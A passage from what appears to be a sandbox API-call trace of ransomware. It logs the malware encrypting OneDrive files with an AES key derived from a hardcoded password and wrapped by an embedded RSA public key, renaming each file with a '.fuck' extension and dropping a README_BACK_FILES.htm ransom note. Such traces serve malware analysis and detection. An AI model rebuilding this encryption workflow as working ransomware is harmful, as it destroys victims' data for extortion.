ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.372] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.372] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.372] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.372] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.372] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.372] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.372] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.372] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.373] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.373] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.373] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.373] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.373] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.373] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.373] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.373] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.373] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.373] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.373] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.373] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.373] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.373] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.373] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.374] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.374] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.374] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.374] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.374] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.374] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.374] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.374] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.374] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.374] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.374] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.374] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.374] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.374] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.374] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.375] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.375] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.375] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.375] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.375] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.375] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.375] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0xc0, lpOverlapped=0x0) returned 1 [0271.375] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xc0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xd0) returned 1 [0271.375] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0271.375] CloseHandle (hObject=0x5d3c) returned 1 [0271.375] CloseHandle (hObject=0x5d4c) returned 1 [0271.375] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0271.380] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0271.381] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0271.382] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0271.384] CryptDestroyHash (hHash=0x2fa748) returned 1 [0271.384] CryptDestroyKey (hKey=0x2fa4c8) returned 1 [0271.384] CryptReleaseContext (hProv=0x2f27e58, dwFlags=0x0) returned 1 [0271.384] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0271.384] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0271.384] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\readme_back_files.htm")) returned 0xffffffff [0271.384] AreFileApisANSI () returned 1 [0271.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0271.384] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.385] GetFileType (hFile=0x5d48) returned 0x1 [0271.385] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0271.386] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.386] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa208 [0271.387] FindNextFileA (in: hFindFile=0x2fa208, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.387] FindNextFileA (in: hFindFile=0x2fa208, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.387] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0271.387] GetLastError () returned 0x0 [0271.387] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\filesync.localizedresources.dll.mui")) returned 0x20 [0271.388] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0271.389] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0271.390] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.392] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0271.392] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f27aa0) returned 1 [0271.395] CryptCreateHash (in: hProv=0x2f27aa0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0271.395] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0271.395] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.395] CryptDeriveKey (in: hProv=0x2f27aa0, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fa748) returned 1 [0271.395] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.395] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0271.396] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f28298) returned 1 [0271.396] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28298, dwCertEncodingType=0x1, pInfo=0x2f31c10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31c40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31c48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb0c8) returned 1 [0271.396] CryptEncrypt (in: hKey=0x2fb0c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0271.396] CryptEncrypt (in: hKey=0x2fb0c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28980*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f28980*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0271.396] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f28980*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f28980*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0271.398] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.407] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.407] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.409] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.409] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.409] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.409] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.409] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.409] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.410] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.410] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.410] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.410] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.410] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.410] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 